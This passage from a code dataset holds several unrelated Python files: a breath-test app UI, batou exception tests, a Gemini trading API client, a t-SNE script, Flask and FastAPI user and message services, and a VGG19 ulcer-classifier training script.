'/log/log_003.json') as json_file:\n self.log = json.load(json_file)\n self.etime = []\n self.weektime = []\n for val in self.log['Etime']:\n tval = datetime.datetime.fromtimestamp(int(val))\n year, weeknum = tval.strftime(\"%Y-%U\").split('-')\n weekcalc = str(year) + '-W' + str(weeknum)\n day_of_week = datetime.datetime.strptime(weekcalc + '-1', \"%Y-W%W-%w\")\n self.weektime.append(day_of_week)\n self.etime.append(tval)\n self.acetone = np.array(self.log['Acetone'])\n dtDateTime = []\n for i in range(0, len(self.log['DateTime'])):\n dtDateTime.append(datetime.datetime.strptime(self.log['DateTime'][i], '%Y-%m-%d %H:%M:%S'))\n vectorized = []\n \n for i in range(0, len(self.acetone)):\n vectorized.append([self.weektime[i], self.acetone[i], dtDateTime[i]])\n self.varray = np.array(vectorized)\n if len(self.acetone) <=0:\n self.varray = []\n try:\n self.notes = self.log['Notes']\n except:\n self.notes = []\n for i in range(0, len(self.log['Acetone'])):\n self.notes.append('')\n self.log['Notes'] = self.notes\n try:\n self.keys = self.log['Key']\n except:\n self.keys = []\n for i in range(0, len(self.log['Acetone'])):\n self.keys.append('')\n self.log['Notes'] = self.notes\n self.log['Key'] = self.keys\n with open(self.cwd + \"/log/log_003.json\", \"w\") as outfile:\n json.dump(self.log, outfile) \n ########################################\n def blink(self): \n if self.d5.alpha == 0.75:\n self.d6.alpha= 0.75\n self.d7.alpha= 0\n self.d8.alpha= 0\n self.d9.alpha= 0\n self.d5.alpha= 0\n elif self.d6.alpha == 0.75:\n self.d7.alpha= 0.75\n self.d8.alpha= 0\n self.d9.alpha= 0\n self.d5.alpha= 0\n self.d6.alpha= 0\n elif self.d7.alpha == 0.75:\n self.d8.alpha= 0.75\n self.d9.alpha= 0\n self.d5.alpha= 0\n self.d6.alpha= 0\n self.d7.alpha= 0\n elif 
self.d8.alpha == 0.75:\n self.d9.alpha= 0.75\n self.d5.alpha= 0\n self.d6.alpha= 0\n self.d7.alpha= 0\n self.d8.alpha= 0 \n elif self.d9.alpha == 0.75:\n self.d5.alpha= 0.75\n self.d6.alpha= 0\n self.d7.alpha= 0\n self.d8.alpha= 0\n self.d9.alpha= 0 \n \n def main(self, direct = True):\n\n self.ble_status.alpha = 0.75 \n \n self.star_button.alpha = 0.75\n self.calc_icon.alpha = 0.75\n if direct:\n fixed_loc = self.results_table.y\n else:\n fixed_loc = self.orig_results_table_loc\n global process_done\n process_done = False\n \n def animate_bar():\n for i in range(0, 200):\n if process_done:\n break\n ui.animate(self.blink, 0.1)\n if DEBUG: print(i)\n time.sleep(0.2)\n\n \n source_path = self.cwd + '/data_files/converted_files/'\n all_src_files = os.listdir(source_path)\n files = []\n for file in all_src_files:\n if \".gitkeep\" not in file:\n files.append(file)\n if DEBUG:\n print(\"these are the files in converted_files: \" + str(files))\n numOfFiles = len(files)\n self.app_console.alpha = 1\n if numOfFiles >1:\n if self.results_table.y == fixed_loc: \n self.results_table.y = self.results_table.y/(2*self.xscaler) + self.app_console.height/2\n self.app_console.text = str(numOfFiles) + ' breath tests are ready to be processed. Beginning data processing...'\n self.d5.alpha = 0.75\n elif numOfFiles == 1:\n if self.results_table.y == fixed_loc: \n self.results_table.y = self.results_table.y/(2*self.xscaler) + self.app_console.height/2\n print('moving to ' + str(self.results_table.y))\n\n self.app_console.text = '1 breath test is ready to be processed. Beginning data processing...'\n self.d5.alpha = 0.75\n else:\n self.app_console.text = 'No breath tests are ready to be processed at this time'\n time.sleep(3)\n \n try:\n with open(self.cwd + '/log/timezone_settings.json') as f:\n tzsource = json.loads(f)\n tz = 'US/Pacific'\n \n \n except:\n tz = 'US/Pacific'\n \n for file in files:\n if fnmatch.fnmatch(file, '*.json'):\n\n dt = datetime.datetime.fromtimestamp(int(file.split('-')[0])).astimezone(timezone(tz)).strftime('%b %d, %Y, %I:%M %p')\n ui.animate(self.blink, 0.1)\n if DEBUG:\n print('Beginning Analysis of test from ' + dt)\n json_path = source_path + '/'+ file\n process_done = False\n with open(json_path) as f:\n data_dict = json.load(f)\n try:\n\n data_dict_to_send = process_test.process(data_dict, dt, DEBUG)\n url = 'https://us-central1-metre3-1600021174892.cloudfunctions.net/metre-7500'\n data_dict_to_send['App_Version'] = APP_VERSION\n json_text = json.dumps(data_dict_to_send)\n self.app_console.text = 'Uploading and interpreting results from test from your ' + dt +' test. 
This may take a few moments...'\n pt = threading.Thread(target = animate_bar) # don't do this unless u start a parallel thread to send request\n pt.start()\n if DEBUG:\n print('sending to cloud')\n start = time.time()\n response = requests.post(url, files = [('json_file', ('test.json', json_text, 'application/json'))])\n process_done = True\n elapsedtime = time.time()-start\n if DEBUG: \n print('received response--response time ' + str(elapsedtime))\n response_json = json.loads(response.text)\n pt.join()\n process_done = True\n self.app_console.text = 'Results from ' + dt + ': ' + response_json['pred_content']\n if DEBUG:\n print(response_json['pred_content'])\n print(response_json)\n newlog = {'Etime': response_json['refnum'],\n 'DateTime': response_json['DateTime'],\n 'Acetone': float(response_json['Acetone']),\n 'Sensor': response_json['sensor'],\n 'Instr': response_json['instrument'],\n 'Notes': '',\n 'Key': ''}\n for key, value in self.log.items():\n self.log[key].append(newlog[key])\n with open(self.cwd + \"/log/log_003.json\", \"w\") as outfile:\n json.dump(self.log, outfile)\n self.getData()\n if DEBUG:\n print(self.acetone)\n self.results_table = self.v['results_table']\n self.restable_inst.update_table() \n except:\n self.app_console.text = 'The test from ' + dt + ' could not be processed.'\n time.sleep(1)\n shutil.move(source_path + file, self.cwd +'/data_files/processed_files/' + file)\n else:\n continue\n time.sleep(1)\n \n self.getData()\n self.restable_inst.update_table() \n self.d5.alpha = 0\n self.d6.alpha = 0\n self.d7.alpha = 0\n self.d8.alpha = 0\n self.d9.alpha = 0\n self.calc_icon.alpha = 0.2\n \n self.app_console.text = 'Test Processing and Upload Complete.'\n time.sleep(2.5)\n self.app_console.alpha = 0\n self.app_console.text = ''\n\n if self.results_table.y != fixed_loc:\n self.results_table.y = fixed_loc\n self.connect_button.action = self.bleStatus()\n self.ble_status.alpha = 1\n \n \n #self.ble_status.text = 'CONNECT'\n\n\nclass NavView(ui.View):\n def __init__(self, app: AppSingleLaunch):\n self.app = app\n self.tint_color = '#494949' \n self.name = \"MetreAce Nav\"\n self.flex = 'WH'\n self.mainscript = MainView()\n self.nav = ui.NavigationView(self.mainscript)\n\n \n\nif __name__ == '__main__':\n app = AppSingleLaunch(\"MetreAce Nav\")\n if not app.is_active():\n nav_class = NavView(app)\n nav_view = nav_class.nav\n nav_view.tint_color = '#494949' \n app.will_present(nav_view)\n nav_view.present()\n nav_class.mainscript.init_check()\n self.connect_button.action = self.bleStatus()\n self.ble_status.alpha = 1\n\n","sub_path":"MetreUI.py","file_name":"MetreUI.py","file_ext":"py","file_size_in_byte":20452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"609026285","text":"from batou import ConfigurationError, ConversionError\nfrom batou import MissingOverrideAttributes, DuplicateComponent\nfrom batou import UnknownComponentConfigurationError, UnusedResources\nfrom batou import UnsatisfiedResources, MissingEnvironment\nfrom batou import ComponentLoadingError, MissingComponent, SuperfluousSection\nfrom batou import SuperfluousComponentSection, SuperfluousSecretsSection\nfrom batou import CycleErrorDetected, NonConvergingWorkingSet\nfrom batou import DuplicateHostError, InvalidIPAddressError\n\nfrom batou.component import ComponentDefinition\nimport sys\n\n\ndef test_configurationerrors_can_be_sorted(root):\n errors = []\n errors.append(ConfigurationError(\"asdffdas\", root.component))\n errors.append(\n 
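# ConversionError is constructed here from a component, an attribute key, the raw value, the target type, and a detail string\n 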
ConversionError(root.component, \"testkey\", \"testvalue\", str, \"foobar\"))\n errors.append(MissingOverrideAttributes(root.component, [\"asdf\", \"bsdfg\"]))\n\n errors.append(\n DuplicateComponent(\n ComponentDefinition(root.component.__class__, \"asdf.py\"),\n ComponentDefinition(root.component.__class__, \"bsdf.py\"),\n ))\n\n try:\n raise ValueError(\"asdf\")\n except Exception:\n _, exc_value, exc_traceback = sys.exc_info()\n\n errors.append(\n UnknownComponentConfigurationError(root, exc_value, exc_traceback))\n\n errors.append(UnusedResources({\"asdf\": [(root.component, 1)]}))\n\n errors.append(UnsatisfiedResources({\"asdf\": [root]}))\n\n errors.append(MissingEnvironment(root.environment))\n\n errors.append(ComponentLoadingError(\"asdf.py\", ValueError(\"asdf\")))\n\n errors.append(MissingComponent(\"component\", \"hostname\"))\n\n errors.append(SuperfluousSection(\"asdf\"))\n\n errors.append(SuperfluousComponentSection(\"asdf\"))\n\n errors.append(SuperfluousSecretsSection(\"asdf\"))\n\n errors.append(CycleErrorDetected(\"foo\"))\n\n errors.append(NonConvergingWorkingSet([root]))\n\n errors.append(DuplicateHostError(\"asdf\"))\n\n errors.append(InvalidIPAddressError((\"127.0.0.256/24\")))\n\n errors.sort(key=lambda x: x.sort_key)\n","sub_path":"src/batou/tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"251251541","text":"import sys\nimport io\nsys.path.append('..')\nimport SpeechRecognition.speech_recognition_wrapper\nimport RecordingPackage.speech_recognition_recording\n\nclass MyModel():\n def __init__(self,vc):\n self.vc = vc\n self.users_database = {}\n\n def record_user(self):\n \"\"\"\n this method records user\n :return:\n \"\"\"\n self.AudioData, self.recorded_text = SpeechRecognition.speech_recognition_wrapper.record_and_recognize(self.vc)\n self.flac = io.BytesIO(self.AudioData.get_flac_data())\n\n def register_user(self, name=None, audiodata = None, flac = None):\n \"\"\"\n this registers the user, with no arguments passed registers the last recorded user\n :return:\n \"\"\"\n if name == None:\n name = self.recorded_text\n if audiodata == None:\n audiodata = self.AudioData\n if flac == None:\n flac = self.flac\n self.users_database[name] = {\"name\": name, \"AudioData\": audiodata,\n \"flac\": flac,\n \"NumpyArray\":\n RecordingPackage.speech_recognition_recording.convert_AudioData_to_Numpy_array_and_fs(\n audiodata)['NumpyArray'],\n \"fs\":\n RecordingPackage.speech_recognition_recording.convert_AudioData_to_Numpy_array_and_fs(\n audiodata)['fs']}\n print(self.users_database)","sub_path":"AplikacjaTestowa/ProgramLogic/MyModel.py","file_name":"MyModel.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"199078407","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('schedules', '0002_auto_20160410_1304'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='schedulebody',\n name='schedule_date',\n field=models.DateField(verbose_name='\\u751f\\u7522\\u65e5\\u671f', db_column=b'MDATE'),\n ),\n migrations.AlterField(\n model_name='scheduleheader',\n name='schedule_date',\n field=models.DateField(verbose_name='\\u751f\\u7522\\u65e5\\u671f', db_column=b'MDATE'),\n ),\n 
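# both AlterField operations above remap schedule_date (production date) onto the legacy MDATE column\n 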
]\n","sub_path":"src/schedules/migrations/0003_auto_20160508_1033.py","file_name":"0003_auto_20160508_1033.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320926244","text":"import os\nimport requests\nimport time\nimport configparser\nimport base64\nimport hmac\nimport hashlib\nimport json\nimport logging as log\n\nclass GeminiRequest(object):\n \"\"\"\n Client that will make requests to Gemini\n \"\"\"\n\n def __init__(self):\n config_file = os.path.join(os.path.dirname(__file__), 'settings.config')\n config = configparser.ConfigParser()\n config.read(config_file)\n self.url = config['API_SETTINGS']['url']\n self.api_key = config['API_SETTINGS']['api_key']\n self.api_secret = config['API_SETTINGS']['api_secret']\n\n\n def _nonce(self):\n return int(time.time()*1000)\n \n\n def _sign(self, data):\n j = json.dumps(data)\n j = base64.standard_b64encode(j.encode('utf8'))\n h = hmac.new(str.encode(self.api_secret), j, hashlib.sha384)\n signature = h.hexdigest()\n return {\n \"X-GEMINI-APIKEY\": self.api_key,\n \"X-GEMINI-SIGNATURE\": signature,\n \"X-GEMINI-PAYLOAD\": j\n }\n\n\n def getLastPrice(self, coin='ethusd'):\n path = '/v1/pubticker/%s'%(coin)\n response = requests.get(self.url + path)\n return float(response.json()['last'])\n\n\n def getPriceSpread(self, coin='ethusd'):\n path = '/v1/pubticker/%s'%(coin)\n response = requests.get(self.url + path)\n return (float(response.json()['bid']), float(response.json()['ask']))\n\n\n def getVolume(self, coin='ethusd'):\n path = '/v1/pubticker/%s'%(coin)\n response = requests.get(self.url + path)\n return float(response.json()['volume']['USD'])\n\n\n def checkBalances(self):\n path = '/v1/balances'\n data = {\n \"request\": \"/v1/balances\",\n \"nonce\": self._nonce()\n }\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n usd = [(x['available'], x['availableForWithdrawal'], x['amount']) for x in response if x['currency'] == 'USD'][0]\n eth = [(x['available'], x['availableForWithdrawal'], x['amount']) for x in response if x['currency'] == 'ETH'][0]\n btc = [(x['available'], x['availableForWithdrawal'], x['amount']) for x in response if x['currency'] == 'BTC'][0]\n ret = {\n 'USD': {'Available': usd[0], 'Withdrawable': usd[1], 'Total': usd[2]},\n 'ETH': {'Available': eth[0], 'Withdrawable': eth[1], 'Total': eth[2]},\n 'BTC': {'Available': btc[0], 'Withdrawable': btc[1], 'Total': btc[2]}\n }\n return ret\n\n\n def buy(self, amount, price, order_type = 'exchange limit', symbol = 'ethusd', exchange = 'gemini'):\n path = '/v1/order/new'\n data = {\n \"request\": \"/v1/order/new\",\n \"nonce\": self._nonce(),\n \"symbol\": symbol,\n \"amount\": round(amount, 4),\n \"price\": round(price, 2),\n \"exchange\": exchange,\n \"side\": \"buy\",\n \"type\": order_type\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n try:\n response['order_id']\n except:\n return response['message']\n\n return response\n\n\n def sell(self, amount, price, order_type = 'exchange limit', symbol = 'ethusd', exchange = 'gemini'):\n path = '/v1/order/new'\n data = {\n 'request': '/v1/order/new',\n 'nonce': self._nonce(),\n 'symbol': symbol,\n 'amount': round(amount, 4),\n 'price': round(price, 2),\n 'exchange': exchange,\n 'side': 'sell',\n 'type': order_type\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n try:\n 
response['order_id']\n except:\n return response['message']\n\n return response\n\n\n def order_status(self, order_id):\n path = '/v1/order/status'\n data = {\n \"request\": \"/v1/order/status\",\n \"nonce\": self._nonce(),\n \"order_id\": order_id\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response\n\n\n def active_orders(self):\n path = '/v1/orders'\n data = {\n \"request\": \"/v1/orders\",\n \"nonce\": self._nonce()\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response\n\n\n def cancel_order(self, order_id):\n path = '/v1/order/cancel'\n data = {\n \"request\": \"/v1/order/cancel\",\n \"nonce\": self._nonce(),\n \"order_id\": order_id\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response\n\n\n def cancel_all_orders(self):\n path = '/v1/order/cancel/session'\n data = {\n \"request\": \"/v1/order/cancel/session\",\n \"nonce\": self._nonce()\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response","sub_path":"Old/api/GeminiRequest.py","file_name":"GeminiRequest.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342447051","text":"from PIL import Image\nfrom sklearn.manifold import TSNE\nimport numpy as np\nimport glob, json, os\n\n# create datastores\nvector_files = []\nimage_vectors = []\nchart_data = {}\nimage_to_size = {}\nimage_to_idx = {}\nmaximum_imgs = None\ndata_dir = '../data/'\nselected_imgs = json.load(open(data_dir + 'json/selected_image_positions.json')).keys()\n\n##\n# build a list of image vectors to process\n##\n\nvector_files = glob.glob(data_dir + 'results/*.npy')\n\n# allow user to only build projections on a subset of the data\nif selected_imgs:\n vf = []\n for i in vector_files:\n img = os.path.basename(i).replace('.npy','')\n if img in selected_imgs:\n vf.append(i)\n vector_files = vf\n\n# allow user to only build projections on n images\nif maximum_imgs:\n vector_files = vector_files[:maximum_imgs]\n\n# get the image sizes\nimage_files = glob.glob(data_dir + 'selected_images/*.jpg')\nfor c, i in enumerate(image_files):\n image_name = os.path.basename(i)\n image_to_size[image_name] = Image.open(i).size\n image_to_idx[image_name] = c\n\n# load the vectors\nfor c, i in enumerate(vector_files):\n image_vectors.append(np.load(i))\n print(' * loaded', c, 'of', len(vector_files), 'image vectors')\n\n# build the tsne model on the image vectors\nprint('building tsne model')\nmodel = TSNE(n_components=2, random_state=0)\nnp.set_printoptions(suppress=True)\nfit_model = model.fit_transform( np.array(image_vectors) )\n \n# store the coordinates of each image in the chart data\nfor c, i in enumerate(fit_model):\n image_name = os.path.basename(vector_files[c]).replace('.npy', '') \n chart_data[image_name] = {\n 'x': i[0],\n 'y': i[1],\n 'idx': image_to_idx[image_name]\n #'z': i[2]\n #'size': image_to_size[image_name]\n }\n\nwith open(data_dir + 'json/selected_image_tsne_projections.json', 'w') as out:\n json.dump(chart_data, out)","sub_path":"utils/cluster_vectors.py","file_name":"cluster_vectors.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"265102725","text":"from flask import Flask\nfrom flask_restful 
import Resource, Api, reqparse\nfrom bson.objectid import ObjectId\nimport os\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__)\napp.config['MONGO_URI'] = os.environ.get('MONGO_URL')\nmongo = PyMongo(app, config_prefix='MONGO')\nprint(mongo)\n\napi = Api(app)\n\nclass MessageController(Resource):\n\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('message', type=str, required=True, location='json')\n args = parser.parse_args(strict=True)\n print(mongo)\n result = mongo.db.messagestore.insert({\"message\" : args.message})\n print(result)\n return {\"digest\" : str(result)}\n\nclass MessagesController(Resource):\n\n def get(self, message_id):\n print(mongo)\n result = mongo.db.messagestore.find_one({'_id': ObjectId(message_id)}, {'_id': False})\n return result\n\napi.add_resource(MessageController, '/messages')\napi.add_resource(MessagesController, '/messages/')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407013624","text":"import uvicorn\r\n\r\nfrom datetime import timedelta\r\nfrom fastapi.encoders import jsonable_encoder\r\nfrom fastapi import APIRouter, FastAPI, Depends, HTTPException, status\r\nfrom fastapi.responses import Response\r\nfrom fastapi.security import OAuth2PasswordRequestForm\r\n\r\nfrom models import UserIn, UserOut, Token, UserPatch, create_user, get_users, update_user_data, \\\r\n delete_user_data, get_user_data, authenticate_user, create_access_token, get_current_user\r\n\r\nACCESS_TOKEN_EXPIRE_MINUTES = 30\r\n\r\napp = FastAPI()\r\nrouter = APIRouter()\r\n\r\n\r\ndef response_model(data, message):\r\n return {\r\n \"data\": [data],\r\n \"code\": 200,\r\n \"message\": message,\r\n }\r\n\r\n\r\ndef error_response_model(error, code, message):\r\n return {\"error\": error, \"code\": code, \"message\": message}\r\n\r\n\r\n@app.post(\"/token\", response_model=Token)\r\nasync def login_for_access_token(form_data: OAuth2PasswordRequestForm = Depends()):\r\n user = authenticate_user(form_data.username, form_data.password)\r\n if not user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"Incorrect username or password\",\r\n headers={\"WWW-Authenticate\": \"Bearer\"},\r\n )\r\n access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)\r\n access_token = create_access_token(\r\n data={\"sub\": user.username}, expires_delta=access_token_expires\r\n )\r\n return {\"access_token\": access_token, \"token_type\": \"bearer\"}\r\n\r\n\r\n@app.get(\"/users/\")\r\ndef users_list():\r\n users = get_users()\r\n return users\r\n\r\n\r\n@app.get(\"/users/me/\", response_model=UserOut)\r\nasync def read_users_me(current_user: UserOut = Depends(get_current_user)):\r\n return current_user\r\n\r\n\r\n@app.post(\"/create\")\r\ndef create_user_data(user: UserIn):\r\n user = jsonable_encoder(user)\r\n new_user = create_user(user)\r\n return new_user\r\n\r\n\r\n@app.get(\"/users/{_id}\", response_description='User data retrieved')\r\ndef user_read(_id: str):\r\n user = get_user_data(_id)\r\n return user\r\n\r\n\r\n@app.put(\"/users/{_id}\", response_description='User data updated')\r\ndef user_update(_id: str, user: UserIn):\r\n user = {k: v for k, v in user.dict().items() if v is not None} # -> \r\n updated_user = update_user_data(_id, user)\r\n if updated_user:\r\n return response_model(\"User with ID: {} updated 
successfully\".format(_id),\r\n \"User updated successfully\",\r\n )\r\n return error_response_model(\r\n \"An error occurred\",\r\n 404,\r\n \"There was an error updating the user data.\",\r\n )\r\n\r\n\r\n@app.patch(\"/users/{_id}\", response_description='User data partially updated')\r\ndef user_partial_update(_id: str, user: UserPatch):\r\n user = {k: v for k, v in user.dict().items() if v is not None} # -> \r\n updated_user = update_user_data(_id, user)\r\n if updated_user:\r\n return response_model(\"User with ID: {} updated successfully\".format(_id),\r\n \"User updated successfully\",\r\n )\r\n return error_response_model(\r\n \"An error occurred\",\r\n 404,\r\n \"There was an error updating the user data.\",\r\n )\r\n\r\n\r\n@app.delete(\"/users/{_id}\", response_description='User data deleted')\r\ndef user_delete(_id: str):\r\n deleted_user = delete_user_data(_id)\r\n if deleted_user:\r\n return response_model(\"User with ID: {} deleted successfully\".format(_id),\r\n \"User deleted successfully\",\r\n )\r\n return error_response_model(\r\n \"An error occurred\",\r\n 404,\r\n \"User doesn't exist\",\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000, reload=True)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603063971","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\n\nfrom tqdm import tqdm\nimport numpy as np\n\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\n\nfrom model.vgg import VGG19\n\nfrom utils.split import no_people_split, ul_people_split, no_instance_split, ul_instance_split\nfrom utils.store_result import save_train_info, save_intermediate_train, save_intermediate_val\nfrom utils.folder import ImageFolder\n\nfrom matplotlib import pyplot as plt\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nn_classes = 2\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Train the VGG19 on images',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-e', '--epochs', metavar='E', type=int, default=25,\n help='Number of epochs', dest='epochs')\n parser.add_argument('-b', '--batch-size', metavar='B', type=int, nargs='?', default=20,\n help='Batch size', dest='batchsize')\n parser.add_argument('-l', '--learning-rate', metavar='LR', type=float, nargs='?', default=0.0000001,\n help='Learning rate', dest='learning_rate')\n parser.add_argument('-s', '--seperate', dest='seperate', type=str, default='instance',\n help='you can choose people, instance, fixed_data')\n parser.add_argument('-t', '--train_type', dest='train', type=str, default='TwoEncoder',\n help='you can choose TwoEncoder, Mynpy')\n parser.add_argument('-n', '--experience-num', dest='num_exp', type=int, default=1,\n help='order number of experiences')\n return parser.parse_args()\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef main(net,\n args,\n device,\n dir_checkpoint='./checkpoints'):\n\n num_exp = args.num_exp\n\n # data & init param\n seperate_by = args.seperate\n train_type = args.train\n\n # train param\n epochs = args.epochs\n batch_size = args.batchsize\n learning_rate = args.learning_rate\n\n # data set path\n if seperate_by == 
'people' or seperate_by == 'instance':\n split_data(num_exp, seperate_by)\n\n # data set path\n data_path = '../data/ulcer_detect'\n\n # image pre-processing\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n\n transform = transforms.Compose([\n transforms.Resize([224, 224]),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n\n #load image set\n trainSet = ImageFolder(root=data_path, transform=transform, \\\n train='train', split_txt=f'./result/{num_exp}/data/')\n\n valSet = ImageFolder(root=data_path, transform=transform, \\\n train='val', split_txt=f'./result/{num_exp}/data/')\n\n n_train = len(trainSet)\n n_val = len(valSet)\n\n train_loader = DataLoader(\n dataset=trainSet,\n batch_size=batch_size,\n shuffle=True,\n num_workers=0,\n pin_memory=True\n )\n val_loader = DataLoader(\n dataset=valSet,\n batch_size=1,\n shuffle=False,\n num_workers=0,\n pin_memory=True\n )\n\n # logging\n logging.info(f'''Starting training:\n Experience number: {num_exp}\n Seperate type: {seperate_by}\n Train type: {train_type}\n Epoch: {epochs}\n Batch size: {batch_size}\n Learning rate: {learning_rate}\n Training size: {n_train}\n Validation size: {n_val}\n Device: {device.type}\n ''')\n\n save_train_info(num_exp, seperate_by, train_type, epochs, batch_size, learning_rate,\\\n n_train, n_val, device.type)\n\n # init optim & loss func\n optimizer = torch.optim.Adam(net.parameters(),lr = learning_rate)\n #optimizer = optim.SGD(net.parameters(), lr=lr, momentum=0.9)\n #lr_scheduler = optim.lr_scheduler.MultiStepLR(optimizer=optimizer, milestones=[int(epochs * 0.5), int(epochs * 0.75)], gamma=0.1, last_epoch=-1)\n criterion = nn.BCELoss().to(device)\n #criterion = nn.CrossEntropyLoss().to(device)\n\n best_val_epoch = 0\n best_val_loss = 999999999.0\n\n loss_flow = []\n\n for epoch in range(epochs):\n # train part\n train_loss = train_net(net,device,train_loader,optimizer,criterion,n_train,epoch,epochs,num_exp)\n # validation part\n val_loss = val_net(net,device,val_loader,criterion,n_val,epoch,num_exp)\n # check best validation set loss on each epoch\n loss_flow.append(train_loss)\n if best_val_loss > val_loss:\n best_val_loss = val_loss\n best_epoch = epoch + 1\n try:\n os.mkdir(dir_checkpoint)\n logging.info('Created checkpoint directory')\n except OSError:\n pass\n torch.save(net.state_dict(),\n dir_checkpoint + f'CP_epoch{epoch + 1}.pth')\n logging.info(f'Checkpoint {epoch + 1} saved !')\n\n plt.plot(range(0, epochs), loss_flow, color='blue',\n lw=2, label='loss for each epoch')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.title('loss for each epoch')\n plt.savefig(\n os.path.join(f\"./result/{num_exp}/Train_Loss.png\"), bbox_inches='tight')\n plt.close()\n # save best validation set loss model\n net.load_state_dict(\n torch.load(f'./checkpoints/{num_exp}/CP_epoch{best_epoch}.pth', map_location=device)\n )\n torch.save(net.state_dict(), f'./result/{num_exp}/state_dict/model.pth')\n \n\ndef train_net(net,device,train_loader,optimizer,criterion,n_train,epoch,epochs,num_exp):\n net.train()\n epoch_loss = 0.0\n correct = 0\n total = 0\n count = 0\n with tqdm(total=n_train, desc=f'Epoch {epoch + 1}/{epochs}', unit='img') as pbar:\n for i, (imgs,target,_) in enumerate(train_loader):\n imgs = imgs.to(device=device)\n target = target.float()\n target = target.to(device=device)\n\n output = net(imgs)\n loss = criterion(output, target)\n\n _, predicted = torch.max(output.data, 1)\n _, target = torch.max(target.data, 1)\n\n total += target.size(0)\n correct += (predicted == 
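# Note on the checkpoint bookkeeping in main() above: the loop initializes
# best_val_epoch but assigns best_epoch, so the later torch.load of
# CP_epoch{best_epoch}.pth only works because the first epoch always improves
# on the 999999999.0 sentinel. A self-contained sketch of that bookkeeping
# with one consistent name (loss values here are illustrative):
best_epoch, best_val_loss = 0, float('inf')
for epoch, val_loss in enumerate([0.9, 0.7, 0.8], start=1):
    if val_loss < best_val_loss:
        best_val_loss, best_epoch = val_loss, epoch
print(best_epoch, best_val_loss)  # 2 0.7 -- the epoch whose checkpoint to reload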
target).sum().item()\n\n epoch_loss += loss.item()\n\n pbar.set_postfix(**{'loss (train)': loss.item()})\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n count += 1\n\n pbar.update(imgs.shape[0])\n accuracy = 100 * correct/total\n print(f'Accuracy train on the images : {accuracy}')\n epoch_loss = epoch_loss / count\n print(f'Train loss in epoch {epoch+1}, loss : {epoch_loss}')\n save_intermediate_train(epoch+1, num_exp, accuracy, epoch_loss)\n return epoch_loss\n\ndef val_net(net,device,val_loader,criterion,n_val,epoch, num_exp):\n net.eval()\n epoch_loss = 0.0\n correct = 0\n total = 0\n\n TP = 0\n FP = 0\n FN = 0\n TN = 0\n\n with tqdm(total=n_val, desc='Validation round', unit='img', leave=False) as pbar:\n for i, (imgs, target,_) in enumerate(val_loader):\n imgs = imgs.to(device=device)\n target = target.float()\n target = target.to(device=device)\n\n output = net(imgs)\n loss = criterion(output, target)\n _, predicted = torch.max(output.data, 1)\n _, target = torch.max(target.data, 1)\n #predicted = (output.data > 0.5).float()\n total += target.size(0)\n correct += (predicted == target).sum().item()\n\n epoch_loss += loss.item()\n\n for item in predicted==target:\n temp_target = target.cpu().numpy()\n if item.item() == 0:\n if temp_target == 0:\n path = 'FP'\n FP = FP + 1\n if temp_target == 1:\n path = 'FN'\n FN = FN + 1\n elif item.item() == 1:\n if temp_target == 1:\n path = 'TP'\n TP = TP + 1\n if temp_target == 0:\n path = 'TN'\n TN = TN + 1\n\n pbar.set_postfix(**{'loss (val)': loss.item()})\n pbar.update(imgs.shape[0])\n\n if (TP + FP) == 0:\n precision = 0.0\n else:\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n specificity = TN / (FP + TN)\n\n 